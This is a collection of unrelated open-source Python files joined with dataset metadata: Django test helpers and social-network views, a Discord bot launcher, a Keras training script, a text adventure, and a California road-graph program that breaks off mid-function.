insert_dupe(self, url, special=None):\n assert self.data1 is not None, \"no data found\"\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n _ = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n _ = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n # _ = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n # response = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n if special is None:\n assert response.status_code == 400, errorMessage(\"insert_dupe\", 400, response.status_code)\n else:\n assert response.status_code == special, errorMessage(\"insert_dupe\", special, response.status_code)\n\n def get(self, url, data):\n response2 = self.client.get(backend_url + \"/\" + url, follow=True)\n assert response2.status_code == 200, errorMessage(\"get\", 200, response2.status_code)\n for key in data:\n # all data should be present\n assert key in response2.data, errorMessage(\"get\", key, None)\n if type(data[key]) == InMemoryUploadedFile:\n continue\n assert data[key] == response2.data[key], errorMessage(\"get (key:{key})\", data[key], response2.data[key])\n # an ID should be present\n assert \"id\" in response2.data, errorMessage(\"insert\", \"id\", None)\n\n def get_non_existent(self, url):\n resp = self.client.get(backend_url + \"/\" + url + \"1234567\", follow=True)\n assert resp.status_code == 404, errorMessage(\"get_non_existent\", 404, resp.status_code)\n\n def patch(self, url, special=None, excluded=None):\n if excluded is None:\n excluded = []\n if special is None:\n special = []\n assert self.data1 is not None, \"no data found\"\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = self.client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response2 = self.client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n # response2 = self.client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n assert response2.status_code == 200, errorMessage(\"patch\", 200, response2.status_code)\n response3 = self.client.get(backend_url + \"/\" + url, follow=True)\n checked = []\n for key, value in special:\n if key in excluded:\n continue\n assert key in response3.data, errorMessage(\"patch\", key, None)\n assert value == response3.data[key], errorMessage(\"patch\", value, response3.data[key])\n checked.append(key)\n for key in self.data1:\n if key in checked or key in excluded:\n continue\n # all data should be present\n assert key in response3.data, errorMessage(\"patch\", key, None)\n if type(self.data1[key]) == InMemoryUploadedFile:\n continue\n assert self.data1[key] == response3.data[key], errorMessage(\"patch\", self.data1[key], response3.data[key])\n assert response3.status_code == 200, errorMessage(\"patch\", 200, response3.status_code)\n assert \"id\" in response3.data, errorMessage(\"patch\", \"id\", None)\n\n def patch_invalid(self, url):\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = self.client.patch(\n backend_url + \"/\" + url + \"123434687658/\", data, content_type=\"application/json\", follow=True\n )\n else:\n response2 = self.client.patch(backend_url + \"/\" + url + \"123434687658/\", self.data1, follow=True)\n # response2 = self.client.patch(backend_url + \"/\" + url + \"123434687658/\", self.data1, follow=True)\n assert response2.status_code == 404, errorMessage(\"patch_invalid\", 404, response2.status_code)\n\n def patch_error(self, url, special=None):\n assert self.data1 is not None, \"no data found\"\n assert self.data2 is not None, \"no data found\"\n # taking a deepcopy to fix file issues when uploading pictures\n backup = deepcopy(self.data2)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response1 = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response1 = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n # response1 = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n if \"region\" in self.data2:\n data = json.dumps(self.data2)\n _ = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n _ = self.client.post(backend_url + \"/\" + url, self.data2, follow=True)\n\n # _ = self.client.post(backend_url + \"/\" + url, self.data2, follow=True)\n assert response1.status_code == 201, errorMessage(\"patch_error\", 201, response1.status_code)\n result_id = response1.data[\"id\"]\n if \"region\" in backup:\n data = json.dumps(backup)\n response2 = self.client.patch(\n backend_url + \"/\" + url + f\"{result_id}\", data, content_type=\"application/json\", follow=True\n )\n else:\n response2 = self.client.patch(backend_url + \"/\" + url + f\"{result_id}\", backup, follow=True)\n\n # response2 = self.client.patch(backend_url + \"/\" + url + f\"{result_id}/\", backup, follow=True)\n if special is None:\n assert response2.status_code == 400, errorMessage(\"patch_error\", 400, response2.status_code)\n else:\n assert response2.status_code == special, errorMessage(\"patch_error\", special, response2.status_code)\n\n def remove(self, url, special=None):\n response2 = self.client.delete(backend_url + \"/\" + url, follow=True)\n assert response2.status_code == 204, errorMessage(\"remove\", 204, response2.status_code)\n response3 = self.client.get(backend_url + \"/\" + url, follow=True)\n if special is not None:\n assert response3.status_code == special, errorMessage(\"remove\", special, response3.status_code)\n else:\n assert response3.status_code == 404, errorMessage(\"remove\", 404, response3.status_code)\n\n def remove_invalid(self, url):\n response2 = self.client.delete(backend_url + \"/\" + url + \"123434687658\", follow=True)\n assert response2.status_code == 404, errorMessage(\"remove_invalid\", 404, response2.status_code)\n\n\ndef auth_error_message(name, role, got, expected):\n return f\"[TEST FAILED]\\tname: {name}\\trole: {role}\\tcode: {got} (expected {expected})\"\n\n\nclass BaseAuthTest(TestCase):\n data1 = None\n\n def list_view(self, url, codes):\n for role in roles:\n client = get_authenticated_client(role)\n resp = client.get(backend_url + \"/\" + url + \"all/\")\n assert resp.status_code == codes[role], auth_error_message(\"list_view\", role, resp.status_code, codes[role])\n\n def insert_view(self, url, codes, special=None):\n if special is None:\n special = []\n adminClient = get_authenticated_client()\n for role in roles:\n client = get_authenticated_client(role)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n resp = client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n resp = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n # resp = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n assert resp.status_code == codes[role], auth_error_message(\n \"insert_view\", role, resp.status_code, codes[role]\n )\n if resp.status_code == 201:\n result_id = resp.data[\"id\"]\n _ = adminClient.delete(backend_url + \"/\" + url + str(result_id))\n for user_id, result in special:\n user = User.objects.filter(id=user_id).first() # there should only be 1\n if not User:\n raise ValueError(\"user not valid\")\n client = APIClient()\n client.force_authenticate(user=user)\n # response2 = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response2 = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n assert response2.status_code == result, auth_error_message(\n \"insert_view (special case)\", user.role.name, response2.status_code, result\n )\n if response2.status_code == 201:\n result_id = response2.data[\"id\"]\n _ = adminClient.delete(backend_url + \"/\" + url + str(result_id))\n\n def get_view(self, url, codes, special=None):\n if special is None:\n special = []\n for role in roles:\n client = get_authenticated_client(role)\n response2 = client.get(backend_url + \"/\" + url, follow=True)\n assert response2.status_code == codes[role], auth_error_message(\n \"get_view\", role, response2.status_code, codes[role]\n )\n for user_id, result in special:\n user = User.objects.filter(id=user_id).first() # there should only be 1\n if not User:\n raise ValueError(\"user not valid\")\n client = APIClient()\n client.force_authenticate(user=user)\n response2 = client.get(backend_url + \"/\" + url, follow=True)\n assert response2.status_code == result, auth_error_message(\n \"get_view (special case)\", user.role.name, response2.status_code, result\n )\n\n def patch_view(self, url, codes, special=None):\n if special is None:\n special = []\n for role in roles:\n client = get_authenticated_client(role)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n # response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n assert response2.status_code == codes[role], auth_error_message(\n \"patch_view\", role, response2.status_code, codes[role]\n )\n for user_id, result in special:\n user = User.objects.filter(id=user_id).first() # there should only be 1\n if not User:\n raise ValueError(\"user not valid\")\n client = APIClient()\n client.force_authenticate(user=user)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n # response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n assert response2.status_code == result, auth_error_message(\n \"patch_view (special case)\", user.role.name, response2.status_code, result\n )\n\n def remove_view(self, url, codes, create):\n exists = False\n instance_id = -1\n for role in roles:\n if not exists:\n instance_id = create()\n # try to remove as `role`\n client = get_authenticated_client(role)\n response2 = client.delete(backend_url + \"/\" + url + f\"{instance_id}/\", follow=True)\n assert response2.status_code == codes[role], auth_error_message(\n \"remove_view\", role, response2.status_code, codes[role]\n )\n exists = codes[role] != 204\n","repo_name":"SELab-2/Dr-Trottoir-4","sub_path":"backend/util/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":14850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"32556250371","text":"import configparser\nimport traceback\n\nfrom discord.ext import commands\n\n##########################################################################################\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\ndiscord_token = config['discord']['Token']\n\n\n##########################################################################################\n\nclass MusicBot(commands.Bot):\n inital_extensions = ['cogs.music']\n\n async def on_ready(self):\n print(f'Logged in as {self.user}')\n\n async def on_message(self, message):\n print(f'Message from {message.author}: {message.content}')\n await self.process_commands(message)\n\n\nclient = MusicBot(command_prefix=commands.when_mentioned_or('!'))\n\nif __name__ == '__main__':\n for extesions in client.inital_extensions:\n try:\n client.load_extension(extesions)\n except Exception as e:\n traceback.print_exc()\n\nclient.run(discord_token)\n\n","repo_name":"Lord-Leonard/Jabba_The_Bot","sub_path":"musicBot.py","file_name":"musicBot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2318108317","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport pandas as pd\n\n\n\ndef create_model(input_dim):\n model = Sequential()\n model.add(Dense(64, activation='relu', input_dim=input_dim))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n model.compile(optimizer='adam', loss='binary_crossentropy',metrics=['accuracy'])\n return model\n\n\ndef train_model_from_pandas(csv_filename):\n df=pd.read_csv(csv_filename)\n data=df.to_numpy()\n nb_columns=data.shape[1]-1 # columns\n model=create_model(nb_columns)\n X = data[:, :nb_columns]\n y = data[:, nb_columns]\n model.fit(X,y,epochs=100,validation_split=0.2)\n\n\n","repo_name":"stephanraaijmakers/deeplearning_utils","sub_path":"code/numpy_pandas_keras.py","file_name":"numpy_pandas_keras.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12414496242","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth import login\nfrom django.contrib.auth import authenticate\n\nfrom .models import Message,Friend,Group,Good\nfrom .forms import GroupCheckForm,GroupSelectForm,\\\n SearchForm,FriendsForm,CreateGroupForm,PostForm, SignUpForm\n\nfrom django.db.models import Q\nfrom django.contrib.auth.decorators import login_required\n\n# indexのビュー関数\n@login_required(login_url='/sns/login/')\ndef index(request):\n (public_user, public_group) = get_public()\n \n if request.method == 'POST':\n \n if request.POST['mode'] == '__check_form__':\n #フォームの作成\n searchform = SearchForm()\n checkform = GroupCheckForm(request.user, request.POST)\n #選択されたグループ名の取得\n glist = []\n #グループ名のループ\n for group in request.POST.getlist('groups'):\n glist.append(group)\n #チェックしたグループに所属するメッセージの取得\n messages = get_your_group_message(request.user, glist, None)\n \n if request.POST['mode'] == '__search_form__':\n searchform = SearchForm(request.POST)\n checkform = GroupCheckForm(request.user)\n groups = Group.objects.filter(owner=request.user)\n glist = [public_group]\n for group in groups:\n glist.append(group)\n messages = get_your_group_message(request.user, glist, \\\n request.POST['search'])\n \n else:\n searchform = SearchForm()\n checkform = GroupCheckForm(request.user)\n groups = Group.objects.filter(owner=request.user)\n glist = [public_group]\n for group in groups:\n glist.append(group)\n messages = get_your_group_message(request.user, glist, None)\n \n params = {\n 'login_user':request.user,\n 'contents':messages,\n 'check_form':checkform,\n 'search_form':searchform,\n }\n \n return render(request, 'sns/index.html', params)\n \n#group編集画\n@login_required(login_url='/sns/login/')\ndef groups(request):\n friends = Friend.objects.filter(owner=request.user)\n\n #POSTアクセス時 \n if request.method == 'POST': \n if request.POST['mode'] == '__groups_form__':\n sel_group_name = request.POST['groups']\n sel_group = Group.objects.filter(owner=request.user) \\\n .filter(title=sel_group_name).first() \n check_friends = Friend.objects.filter(owner=request.user) \\\n .filter(group=sel_group) \n userlist = []\n for friend in check_friends:\n userlist.append(friend.user.username) \n groupsform =GroupSelectForm(request.user, request.POST)\n friendsform = FriendsForm(request.user, \\\n friends = friends, vals = userlist)\n \n if request.POST['mode'] == '__friends_form__':\n sel_group_name = request.POST['group']\n sel_group = Group.objects.filter(owner=request.user) \\\n .filter(title=sel_group_name).first()\n # 選択したGroupが '-'出会った場合の処理\n if sel_group == None:\n messages.info(request, ' Groupを選択してください。')\n return redirect(to='/sns/groups')\n check_friend_names = request.POST.getlist('friends')\n check_users = User.objects.filter(username__in=check_friend_names)\n friends = Friend.objects.filter(owner = request.user) \\\n .filter(user__in=check_users)\n userlist = []\n for friend in friends:\n friend.group = sel_group\n friend.save()\n userlist.append(friend.user.username)\n messages.success(request, ' チェックされたFriendを' + \\\n sel_group_name + ' に登録しました') \n groupsform = GroupSelectForm(request.user, {'groups':sel_group})\n friendsform = FriendsForm(request.user, \\\n friends=friends, vals=userlist)\n \n #GETアクセス時\n else:\n groupsform = GroupSelectForm(request.user)\n friendsform = FriendsForm(request.user, friends=friends, vals=[])\n sel_group_name = '-'\n \n createform = CreateGroupForm()\n params = {\n 'login_user':request.user,\n 'groups_form':groupsform,\n 'friends_form':friendsform,\n 'create_form':createform,\n 'group_name':sel_group_name,\n }\n return render(request, 'sns/groups.html', params)\n\n#Friendの追加処理 \n@login_required(login_url='/sns/login/')\ndef add(request):\n add_name = request.GET['name']\n add_user = User.objects.get(username=add_name)\n #自身をaddしようとした場合の処理\n if add_user == request.user:\n messages.info(request, \"自分自身をFriendに追加することはできません。\")\n return redirect(to='/sns')\n #既にFriendである場合の処理\n friend_num = Friend.objects.filter(owner=request.user) \\\n .filter(user=add_user).count()\n # friend_numが1であれば、既に登録されているということ\n if friend_num > 0:\n messages.info(request, add_user.username + \\\n ' はすでに追加されています。')\n return redirect(to='/sns')\n (public_user, public_group) = get_public()\n #Friendの登録処理\n friend_obj = Friend()\n friend_obj.owner = request.user\n friend_obj.user = add_user\n friend_obj.group = public_group\n friend_obj.save()\n messages.success(request, add_user.username + ' を追加しました! \\\n groupページに移動して、追加したFriendをメンバーに設定してください。')\n return redirect(to='/sns')\n#Groupの作成処理\n@login_required(login_url='/sns/login/')\ndef creategroup(request):\n group_name = request.POST['group_name']\n group_num = Group.objects.filter(owner=request.user) \\\n .filter(title=group_name).count()\n if group_num > 0:\n messages.info(request, group_name + ' はすでに存在します。')\n return redirect(to='/sns/groups')\n #Groupの登録\n group_obj = Group()\n group_obj.owner = request.user\n group_obj.title = group_name\n group_obj.save()\n messages.info(request, '新しいグループを追加しました。')\n return redirect(to='/sns/groups')\n \n#メッセージのポスト処理\n@login_required(login_url='/sns/login/')\ndef post(request):\n if request.method == 'POST':\n content = request.POST['content']\n group_name = request.POST['groups']\n group_obj = Group.objects.filter(owner=request.user) \\\n .filter(title=group_name).first() \n if group_obj == None:\n (pub_user, group_obj) = get_public()\n msg = Message()\n msg.owner = request.user\n msg.group = group_obj\n msg.content = content\n msg.save()\n messages.success(request, '新しいメッセージを投稿しました。')\n return redirect(to='/sns')\n #GETアクセス時\n else:\n postform = PostForm(request.user)\n \n params = {\n 'login_user':request.user,\n 'form':postform,\n }\n return render(request, 'sns/post.html', params)\n \n@login_required(login_url='/sns/login/')\ndef share(request, share_id):\n share_message = Message.objects.get(id=share_id)\n \n if request.method == 'POST':\n group_name = request.POST['groups']\n content = request.POST['content']\n group = Group.objects.filter(owner=request.user) \\\n .filter(title=group_name).first()\n if group == None:\n (pub_user, group) = get_public()\n message = Message()\n message.owner = request.user\n message.group = group\n message.content = content\n message.share_id = share_message.id\n message.save()\n share_message.share_count += 1\n share_message.save()\n messages.success(request, 'メッセージをシェアしました。')\n return redirect(to='/sns')\n \n form = PostForm(request.user)\n params = {\n 'login_user':request.user,\n 'form':form,\n 'share':share_message,\n }\n return render(request, 'sns/share.html', params)\n \n@login_required(login_url='/sns/login/')\ndef good(request, good_id):\n \n good_message = Message.objects.get(id=good_id)\n is_good = Good.objects.filter(owner=request.user) \\\n .filter(message=good_message).count()\n if is_good > 0:\n messages.success(request, '既にメッセージにはGoodしています。')\n return redirect(to='/sns')\n \n good_message.good_count += 1\n good_message.save()\n \n good = Good()\n good.owner = request.user\n good.message = good_message\n good.save()\n \n messages.success(request, 'メッセージにGoodしました。')\n return redirect(to='/sns')\n\ndef get_your_group_message(owner, glist, find):\n (public_user, public_group) = get_public()\n\n #ログインユーザーがチェックしたグループインスタンスを取得する\n check_groups = Group.objects.filter(Q(owner=owner) | Q(owner=public_user)) \\\n .filter(title__in=glist)\n \n check_friends = Friend.objects.filter(group__in=check_groups)\n check_users = []\n for friend in check_friends:\n check_users.append(friend.user)\n #選択したグループに所属するユーザーが保持するグループ \n target_users_groups = Group.objects.filter(owner__in=check_users)\n #ここで得られるFriendインスタンスは、チェックしたグループに所属するユーザーが、\n #ログインユーザーをメンバーに持つグループを取得するためのもの\n target_friends = Friend.objects.filter(group__in=target_users_groups) \\\n .filter(user=owner)\n\n # 表示したいユーザーが作成した、ログインユーザーが所属するグループ\n me_belong_groups = []\n for friend in target_friends:\n me_belong_groups.append(friend.group)\n \n if find==None:\n messages = Message.objects.filter(Q(group__in=me_belong_groups) \\\n |Q(group__in=check_groups))[:100]\n else:\n messages = Message.objects.filter(Q(group__in=me_belong_groups) \\\n |Q(group__in=check_groups)) \\\n .filter(content__contains=find)[:100]\n return messages\n \ndef get_public():\n public_user = User.objects.get(username='public')\n public_group = Group.objects.get(owner=public_user)\n return (public_user, public_group)\n\n#ユーザー登録処理\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(to='/sns')\n else:\n form = SignUpForm()\n return render(request, 'sns/signup.html', {'form':form})\n\n#ログイン処理\ndef signin(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect(to='/sns')\n else:\n messages.info(request, 'ユーザー名/パスワードが正しくありません。')\n\n return render(request, 'sns/login.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akihisa2359/sns","sub_path":"sns/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42670112437","text":"import gamedata\nimport pictures\n\n\ndef get_next_state(state):\n \"\"\"Returnerar nästa state baserat på användarens input.\"\"\"\n \n succ_states = gamedata.ADVENTURE_TREE[state]\n \n if len(succ_states) == 1:\n return succ_states[0]\n\n options_text = \"{} {}\\n{} {}\".format(\"1\", gamedata.OPTIONS[succ_states[0]],\n \"2\", gamedata.OPTIONS[succ_states[1]])\n print(options_text)\n inp = input(\">> \")\n\n if inp == \"1\":\n return succ_states[0]\n elif inp == \"2\":\n return succ_states[1]\n\n\ndef main():\n \"\"\"Startar igång spelet. Innehåller spel-loopen.\"\"\"\n\n # Frågar efter spelarens namn.\n name = input(\"What's your name?\\n>> \")\n print(\"Welcome {} to the adventure of your life. Try to survive and find the \\\n treasure!\".format(name.upper()))\n\n current_state = \"Start\"\n\n # Tar sig igenom ADVENTURE_TREE tills en ändpunkt nås.\n while current_state != \"End\":\n succ_states = gamedata.ADVENTURE_TREE[current_state]\n description = gamedata.DESCRIPTIONS[current_state]\n pictures.print_pic(current_state)\n print(description)\n current_state = get_next_state(current_state)\n\n\nmain()\n","repo_name":"RubenAngelov/TDDE44","sub_path":"labb_4/del_2/adventure.py","file_name":"adventure.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8910273588","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 21 04:20:58 2019\r\n\r\n@author: marco\r\n\"\"\"\r\n\r\n#imports\r\nimport gzip\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport math\r\nfrom bitarray import bitarray\r\nimport pandas as pd\r\nimport heapq\r\nimport func_1\r\nimport func_2\r\nimport func_3\r\nimport func_4\r\nimport sys\r\nsys.setrecursionlimit(100000)\r\n\r\n#Class for vertex object\r\nclass Vertex(object):\r\n \r\n #Constuctor of the object Node / istance Node\r\n def __init__(self, node_id, latitude, longitude): \r\n self.id = node_id \r\n self.latitude = latitude \r\n self.longitude = longitude \r\n self.connectedTo = {}\r\n self.previous = None\r\n \r\n #storing for each node its neighbours and \r\n #the relative weight\r\n def addNeighbor(self, nbr, weight = 0):\r\n self.connectedTo[nbr] = weight \r\n \r\n def __str__(self):\r\n return str(self.id) + ' connectedTo: ' + str([x.id for x in self.connectedTo]) \r\n \r\n #knowing the neighoburs of the node \r\n def getConnections(self):\r\n return list(self.connectedTo.keys()) \r\n \r\n #returning the id of a node\r\n def getId(self): \r\n return self.id\r\n #knowing the distance between \r\n #a node and the neighbour \r\n def getWeight(self, nbr): \r\n return self.connectedTo[nbr]\r\n \r\n #returning positions of a node\r\n def getPositions(self):\r\n return [self.latitude, self.longitude]\r\n\r\n#Classes representing the 3 Graphs:\r\n#Graph with Physical distances\r\nclass Graph_physical: \r\n def __init__(self):\r\n self.vertList = {} \r\n self.numVertices = 0 \r\n #Adding new vertex for the graph and mapping it\r\n #into the dictionary of the graph\r\n def addVertex(self, key, latitude, longitude):\r\n self.numVertices = self.numVertices + 1 \r\n newVertex = Vertex(key, latitude, longitude) \r\n self.vertList[key] = newVertex\r\n return newVertex \r\n \r\n #Obtatining lat e lot of all the nodes of the graph\r\n def getPositions(self):\r\n positions = []\r\n for n in self.vertList:\r\n node = self.vertList[n]\r\n pos = node.getPositions()\r\n positions.append(pos)\r\n return positions\r\n \r\n #Recalling the istance related to the key 'n' in vertList\r\n def getVertex(self, n):\r\n if n in self.vertList:\r\n return self.vertList[n] \r\n else:\r\n return None\r\n\r\n def __contains__(self, n):\r\n return n in self.vertList\r\n \r\n #Adding an edge between two nodes\r\n def addEdge(self, f, t, weight = 0):\r\n if f not in self.vertList:\r\n nv = self.addVertex(f)\r\n if t not in self.vertList:\r\n nv = self.addVertex(t)\r\n self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n \r\n #obtaining all the vertices of the graph\r\n def getVertices(self):\r\n return self.vertList.keys() \r\n\r\n def __iter__(self):\r\n return iter(self.vertList.values())\r\n \r\n#2. Graph with time Distance\r\nclass Graph_time: \r\n def __init__(self):\r\n self.vertList = {} \r\n self.numVertices = 0 \r\n\r\n def addVertex(self, key, latitude, longitude):\r\n self.numVertices = self.numVertices + 1 \r\n newVertex = Vertex(key, latitude, longitude) \r\n self.vertList[key] = newVertex \r\n return newVertex \r\n\r\n def getVertex(self, n):\r\n if n in self.vertList:\r\n return self.vertList[n] \r\n else:\r\n return None\r\n\r\n def __contains__(self, n):\r\n return n in self.vertList\r\n\r\n def addEdge(self, f, t, weight=0):\r\n if f not in self.vertList:\r\n nv = self.addVertex(f)\r\n if t not in self.vertList:\r\n nv = self.addVertex(t)\r\n self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n\r\n def getVertices(self):\r\n return self.vertList.keys() \r\n\r\n def __iter__(self):\r\n return iter(self.vertList.values())\r\n\r\n#Graph for network distance\r\nclass Graph_network: \r\n def __init__(self):\r\n self.vertList = {} \r\n self.numVertices = 0 \r\n\r\n def addVertex(self, key, latitude, longitude):\r\n self.numVertices = self.numVertices + 1 \r\n newVertex = Vertex(key, latitude, longitude) \r\n self.vertList[key] = newVertex \r\n return newVertex \r\n\r\n def getVertex(self, n):\r\n if n in self.vertList:\r\n return self.vertList[n] \r\n else:\r\n return None\r\n\r\n def __contains__(self, n):\r\n return n in self.vertList\r\n\r\n def addEdge(self, f, t, weight=0):\r\n if f not in self.vertList:\r\n nv = self.addVertex(f)\r\n if t not in self.vertList:\r\n nv = self.addVertex(t)\r\n self.vertList[f].addNeighbor(self.vertList[t], weight)\r\n\r\n def getVertices(self):\r\n return list(self.vertList.keys()) \r\n\r\n def __iter__(self):\r\n return iter(self.vertList.values())\r\n \r\n#cleaning coordinates file\r\ncoord_file = []\r\nf1 = gzip.open('USA-road-d.CAL.co.gz','rb')\r\ncoord_file = f1.readlines()\r\ncoord_file = coord_file[7:]\r\nfor i in range(len(coord_file)):\r\n coord_file[i] = str(coord_file[i])\r\n coord_file[i] = coord_file[i].replace(\"\\\\n\",'')\r\n coord_file[i] = coord_file[i].replace(\"'\",'')\r\n coord_file[i] = coord_file[i].split(' ')\r\n coord_file[i].remove(coord_file[i][0]) \r\n coord_file[i][1]= float((coord_file[i][1])[:4] + '.' + (coord_file[i][1])[4:]) \r\n coord_file[i][2]= float((coord_file[i][2])[:2] + '.' + (coord_file[i][2])[2:])\r\n\r\n#cleaning physical distance file \r\ndist_file = [] \r\nf2 = gzip.open('USA-road-d.CAL.gr.gz','rb')\r\ndist_file = f2.readlines()\r\ndist_file = dist_file[7:]\r\nfor i in range(len(dist_file)):\r\n dist_file[i] = str(dist_file[i])\r\n dist_file[i] = dist_file[i].replace(\"\\\\n\",'')\r\n dist_file[i] = dist_file[i].replace(\"'\",'')\r\n dist_file[i] = dist_file[i].split(' ')\r\nfor i in range(len(dist_file)):\r\n dist_file[i].remove(dist_file[i][0])\r\n \r\n \r\n#cleaning time distances file \r\ntime_file = [] \r\nf3 = gzip.open('USA-road-t.CAL.gr.gz','rb')\r\ntime_file = f3.readlines()\r\ntime_file = time_file[7:]\r\nfor i in range(len(time_file)):\r\n time_file[i] = str(time_file[i])\r\n time_file[i] = time_file[i].replace(\"\\\\n\",'')\r\n time_file[i] = time_file[i].replace(\"'\",'')\r\n time_file[i] = time_file[i].split(' ')\r\nfor i in range(len(time_file)):\r\n time_file[i].remove(time_file[i][0])\r\n\r\n\r\n#Creating the Graph with physical distances \r\nG_physical = Graph_physical()\r\nfor city in coord_file:\r\n G_physical.addVertex(city[0], city[1], city[2])\r\nfor link in dist_file:\r\n G_physical.addEdge(link[0], link[1], weight = link[2])\r\n\r\n\r\n#Creating the Graph with time distances\r\nG_time = Graph_time()\r\nfor city in coord_file:\r\n G_time.addVertex(city[0], city[1], city[2])\r\nfor link in time_file:\r\n G_time.addEdge(link[0], link[1], weight = link[2])\r\n\r\n#Creating the graph with network distances\r\nG_network = Graph_network()\r\nfor city in coord_file:\r\n G_network.addVertex(city[0], city[1], city[2])\r\nfor link in dist_file:\r\n G_network.addEdge(link[0], link[1], weight = 1)\r\n \r\n#taking all the longitudes and latitudes \r\nlat = []\r\nlon = []\r\nfor city in coord_file:\r\n lat.append(city[1])\r\n lon.append(city[2])\r\n\r\n#The four functions belows allow the user to choose\r\n#between physical, network and time distance \r\ndef choice_distance_1(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_1.Function_1(G_physical, 'violet', lat, lon)\r\n elif dist_choice == 2:\r\n func_1.Function_1(G_time, 'white', lat, lon)\r\n elif dist_choice == 3:\r\n func_1.Function_1(G_network, 'azure', lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_1()\r\n \r\ndef choice_distance_2(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_2.Function_2(G_physical)\r\n elif dist_choice == 2:\r\n func_2.Function_2(G_time)\r\n elif dist_choice == 3:\r\n func_2.Function_2(G_network)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_2()\r\n \r\ndef choice_distance_3(): \r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_3.Function_3(G_physical, lat, lon)\r\n elif dist_choice == 2:\r\n func_3.Function_3(G_time, lat, lon)\r\n elif dist_choice == 3:\r\n func_3.Function_3(G_network, lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_3()\r\n\r\ndef choice_distance_4():\r\n dist_choice = int(input('Choose between: \\n1.Physical distance; \\n2.Time distance; \\n3.Network distance. \\nYour choice: ', ))\r\n if dist_choice == 1:\r\n func_4.Function_4(G_physical, lat, lon)\r\n elif dist_choice == 2:\r\n func_4.Function_4(G_time, lat, lon)\r\n elif dist_choice == 3:\r\n func_4.Function_4(G_network, lat, lon)\r\n else:\r\n print('Please, enter a value between: 1 - 2 - 3')\r\n return choice_distance_4()\r\n\r\n#This function allows the user to choose which function he wants to use\r\ndef Function_to_use():\r\n f_choice = int(input('Choose between: \\n1.Find the Neighbours!; \\n2.Find the smartest Network!; 